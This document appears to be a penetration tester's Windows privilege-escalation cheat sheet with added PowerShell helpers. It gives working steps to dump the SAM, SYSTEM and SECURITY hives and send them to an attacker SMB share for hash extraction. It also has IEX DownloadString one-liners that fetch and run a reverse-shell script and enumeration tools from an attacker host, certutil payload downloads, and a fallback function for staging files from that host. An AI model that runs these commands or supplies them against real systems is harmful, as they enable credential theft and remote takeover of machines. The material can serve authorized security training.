Useful commands:
# Find a file by name anywhere under a directory (here the user profiles on the C drive).
# Using PowerShell (-ErrorAction SilentlyContinue hides the access-denied noise from other users' folders):
Get-ChildItem -Path C:\Users\ -Include local.txt -Recurse -ErrorAction SilentlyContinue
# Using CMD:
# '/s' lists every occurrence of the specified file name within the specified directory and all subdirectories.
C:\> dir /s local.txt
# 'where', recursive:
where /r C:\windows eventvwr.exe
# When 'whoami' is not recognized as an internal or external command, restore a sane PATH (affects the current cmd session only):
set PATH=%SystemRoot%\system32;%SystemRoot%;
<aside>
<img src="/icons/light-bulb_purple.svg" alt="/icons/light-bulb_purple.svg" width="40px" /> Use: fsutil file createnew c:\path\testfile.txt 0 to create an empty file, similar to touch in Linux. Then echo output into the file.
</aside>
# Retrieve Windows hashes (needs an elevated shell: reg save on these hives fails with "Access is denied" otherwise):
reg.exe save hklm\sam c:\temp\sam_backup
reg.exe save hklm\system c:\temp\system
reg.exe save hklm\security c:\temp\security_backup
# On Kali, start an SMB share to receive the files (either form; the second one shares the 'post' directory):
sudo impacket-smbserver -smb2support Share .
sudo impacket-smbserver -smb2support Share post
# Newer Windows builds refuse unauthenticated (guest) access to SMB shares, so the mount may fail without credentials; add a username and password:
sudo impacket-smbserver -username user -password qwe123 -smb2support Share 'post'
# I used to create a separate dir to store the hashes, so:
mkdir post
# Back to Windows, map the share (without or with credentials; net use takes the password first, then /user:):
net use o: \\192.168.xxx.xxx\Share
net use o: \\192.168.xxx.xxx\Share qwe123 /user:user
# Once the connection is established, copy the hive files out:
copy c:\temp\sam_backup o:\
copy c:\temp\system o:\
copy c:\temp\security_backup o:\
# On Kali, extract the hashes from the files that landed in the share directory (either tool works):
samdump2 system sam_backup -o dump_output
secretsdump.py -sam sam_backup -system system -security security_backup LOCAL
# Starting our Web server:
python3 -m http.server <LPORT>
# Certutil:
certutil -urlcache -f "http://<LHOST>:<LPORT>/<file>" <output-file>
# SMB:
# On Kali (shares the current directory under the share name 'kali'):
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
# On target (the share name must be part of the UNC path):
copy \\<myip>\kali\reverse.exe C:\tmp\reverse.exe
# PowerShell:
cmd /c powershell IEX(new-object net.webclient).downloadstring('http://<LHOST>/Invoke-PowerShellTcp.ps1')
powershell.exe IEX(new-object net.webclient).downloadstring('http://<LHOST>/Invoke-PowerShellTcp.ps1')
powershell -c IEX(new-object net.webclient).downloadstring('http://<LHOST>/Invoke-PowerShellTcp.ps1')
# Curl in PowerShell: in Windows PowerShell 5.1 'curl' is an alias of Invoke-WebRequest, so use -OutFile (a bare -o clashes with the -OutVariable/-OutBuffer common parameters); in PowerShell 7 'curl' runs curl.exe, where -o is the right flag:
curl http://<LHOST>/<file> -OutFile <file>
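A download helper that tries the transports listed above in turn and checks the file's SHA256 before it is used. This is an added example, not part of the original notes; the URL and expected hash are placeholders, and the hash is the value `sha256sum <file>` prints on Kali for the file you are serving.

```powershell
# Added example (not part of the original notes): fetch a file from the attacker's
# web server via WebClient, Invoke-WebRequest or certutil, whichever works first,
# then verify its SHA256. URL, output path and hash are placeholders.
function Get-StagedFile {
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][string]$OutFile,
        [string]$ExpectedSha256      # leave empty to skip the integrity check
    )
    # Each transport is tried in this order; the scriptblocks see $Url/$OutFile from this scope.
    $methods = [ordered]@{
        WebClient = { (New-Object Net.WebClient).DownloadFile($Url, $OutFile) }
        IWR       = { Invoke-WebRequest -Uri $Url -OutFile $OutFile -UseBasicParsing }
        certutil  = { & certutil.exe -urlcache -f $Url $OutFile | Out-Null
                      if ($LASTEXITCODE -ne 0) { throw "certutil exit code $LASTEXITCODE" } }
    }
    foreach ($name in $methods.Keys) {
        Remove-Item $OutFile -Force -ErrorAction SilentlyContinue
        try { & $methods[$name] } catch { Write-Warning "$name failed: $($_.Exception.Message)"; continue }
        if (-not (Test-Path $OutFile)) { continue }
        if ($ExpectedSha256) {
            $actual = (Get-FileHash $OutFile -Algorithm SHA256).Hash
            if ($actual -ne $ExpectedSha256.ToUpper()) {
                Remove-Item $OutFile -Force
                throw "SHA256 mismatch for $OutFile (got $actual via $name)"
            }
        }
        Write-Host "[+] $OutFile fetched via $name"
        return Get-Item $OutFile
    }
    throw "every download method failed for $Url"
}

# Usage (placeholders):
# Get-StagedFile -Url 'http://<LHOST>:<LPORT>/nc64.exe' -OutFile "$env:TEMP\nc64.exe" -ExpectedSha256 '<sha256 from kali>'
```

The fallback order matters on locked-down hosts: WebClient and Invoke-WebRequest go through the .NET proxy settings, while certutil.exe is a separate binary that is sometimes blocked by application control even when PowerShell is not, so it is tried last.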
General PrivEsc enumeration scripts. To save time, I moved all the Windows scripts into one directory and made it reachable over both SMB and HTTP:
# Host files in the current directory via SMB:
impacket-smbserver share .
# Host files in the current directory via HTTP:
python3 -m http.server 1234
<aside>
<img src="/icons/light-bulb_purple.svg" alt="/icons/light-bulb_purple.svg" width="40px" /> Tip: quickly set up the SMB and web servers by making aliases for the commands above, e.g. webup and smbup.
</aside>
Below, I listed different PrivEsc tools and files that I would generally have hosted through the SMB and HTTP server for quick access:
accesschk64.exe
accesschk.exe
accesschk-XP.exe
Invoke-PowerShellTcp.ps1
jaws-enum.ps1
lazagne.exe
Powerless.bat
PowerUp.ps1
Seatbelt.exe
SharpUp.exe
Sherlock.ps1
tmp/ # folder for random files that you want to transfer
winbin/ # a copy of the Windows binaries found in /usr/share/windows-binaries/:
nc64.exe
nc.exe
plink.exe
vncviewer.exe
wget.exe
whoami.exe
...
windows-exploit-suggester.py
winPEASany.exe
winPEASx64.exe
winPEASx86.exe
I used the following commands to run these files straight from the SMB share or the web server, so nothing is written to the target's disk (the UNC-path binaries are still read over SMB by the loader; the PowerShell one-liners run the scripts in memory):
# WinPEAS:
\\192.168.xxx.xxx\share\winPEASx64.exe searchall cmd
\\192.168.xxx.xxx\share\winPEASx86.exe searchall cmd
# PowerUp:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.xxx.xxx/PowerUp.ps1'); Invoke-AllChecks"
# Sherlock:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.xxx.xxx/Sherlock.ps1'); Find-AllVulns"
# JAWS:
powershell.exe -ExecutionPolicy Bypass -File \\192.168.xxx.xxx\share\jaws-enum.ps1
powershell iex(new-object system.net.webclient).downloadstring('http://192.168.xxx.xxx/jaws-enum.ps1')
# Seatbelt - search for non-standard services:
\\192.168.xxx.xxx\share\Seatbelt.exe NonstandardServices
# LaZagne - search for passwords:
\\192.168.xxx.xxx\share\lazagne.exe all
<aside> <img src="/icons/light-bulb_purple.svg" alt="/icons/light-bulb_purple.svg" width="40px" /> My approach: if I need to find a PrivEsc vector quickly, I start with the basic checks outlined below first, and only once it’s done and nothing interesting showed up, then I proceed to use the enumeration scripts. Saves a lot of time.
</aside>
The general flow I used for Windows Privilege Escalation is:
Begin with basics:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
echo %username%
# Token privileges, group memberships, or everything at once:
whoami /priv
whoami /groups
whoami /all
whoami && net user
whoami && (set | findstr /i "PROCESSOR_ARCHITECTURE") && whoami /priv
Now that we have this basic information, we list other user accounts available on the system and view our own user information in finer detail:
C:\Windows> net users
C:\Windows> net user <our-username>
# View domain groups (only works on a domain-joined host that can reach a DC):
net group /domain
# View members of a domain group (the group name goes before the /domain switch):
net group "<Group Name>" /domain
Now that we know the users and their permissions, the next question is networking: what this machine is connected to and what rules apply to those connections:
C:\Windows> ipconfig /all | more
C:\Windows> type C:\Windows\System32\drivers\etc\hosts
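The basic checks above (OS, identity, privileges, local and domain accounts, networking and the hosts file) collected in one pass, so the first minute on a new shell produces one readable report instead of a dozen separate commands. This is an added example, not part of the original notes; it assumes Windows 10 / Server 2016 or later with PowerShell 5.1, because Get-LocalUser and the Get-Net* cmdlets are not available on older hosts, where the cmd commands above are the fallback.

```powershell
# Added example (not part of the original notes): the "basics" from the notes
# as a single function. Assumes Windows 10 / Server 2016+ with PowerShell 5.1.
function Get-PrivEscBasics {
    [CmdletBinding()]
    param([string]$ReportPath)   # optional: also write the report to a file

    $r = [ordered]@{}
    $os = Get-CimInstance Win32_OperatingSystem
    $r['OS']       = "$($os.Caption) $($os.Version) build $($os.BuildNumber) ($($os.OSArchitecture))"
    $r['Hostname'] = $env:COMPUTERNAME
    $r['User']     = "$env:USERDOMAIN\$env:USERNAME"
    $r['Arch']     = $env:PROCESSOR_ARCHITECTURE

    # Token privileges: the Enabled/Disabled column is what matters (SeImpersonate, SeBackup, ...).
    $r['Privileges'] = (& whoami.exe /priv) -join "`n"
    $r['Groups']     = (& whoami.exe /groups /fo list) -join "`n"

    # Local accounts, and who sits in the local Administrators group.
    $r['LocalUsers']  = (Get-LocalUser | Select-Object Name, Enabled, LastLogon | Format-Table -AutoSize | Out-String).Trim()
    $r['LocalAdmins'] = (Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue | ForEach-Object Name) -join ', '

    # Domain checks only make sense on a domain-joined host; skip them otherwise.
    $cs = Get-CimInstance Win32_ComputerSystem
    if ($cs.PartOfDomain) {
        $r['Domain']       = $cs.Domain
        $r['DomainGroups'] = (& net.exe group /domain 2>&1) -join "`n"
    } else {
        $r['Domain'] = 'not domain-joined (net group /domain skipped)'
    }

    # Networking: addresses, default route, listening ports, then the hosts file without comments.
    $r['Interfaces'] = (Get-NetIPAddress -AddressFamily IPv4 | Where-Object IPAddress -ne '127.0.0.1' |
                        ForEach-Object { "$($_.InterfaceAlias): $($_.IPAddress)/$($_.PrefixLength)" }) -join "`n"
    $r['Routes']     = (Get-NetRoute -AddressFamily IPv4 | Where-Object DestinationPrefix -eq '0.0.0.0/0' |
                        ForEach-Object { "default via $($_.NextHop) on $($_.InterfaceAlias)" }) -join "`n"
    $r['Listeners']  = (Get-NetTCPConnection -State Listen | Sort-Object LocalPort -Unique |
                        ForEach-Object { "$($_.LocalAddress):$($_.LocalPort) pid $($_.OwningProcess)" }) -join "`n"
    $hostsFile = "$env:SystemRoot\System32\drivers\etc\hosts"
    $r['Hosts']      = (Get-Content $hostsFile | Where-Object { $_ -and $_ -notmatch '^\s*#' }) -join "`n"

    $report = ($r.GetEnumerator() | ForEach-Object { "=== $($_.Key) ===`n$($_.Value)`n" }) -join "`n"
    if ($ReportPath) { $report | Set-Content -Path $ReportPath }
    return $report
}

Get-PrivEscBasics
```

The listening-port list is the one item the notes' cmd commands do not cover: a service bound only to 127.0.0.1 is a classic PrivEsc vector (port-forward it with plink from the winbin folder) and would be missed by an external nmap scan. Run with `-ReportPath \\192.168.xxx.xxx\share\basics.txt` to drop the report straight onto the Kali share instead of the target's disk.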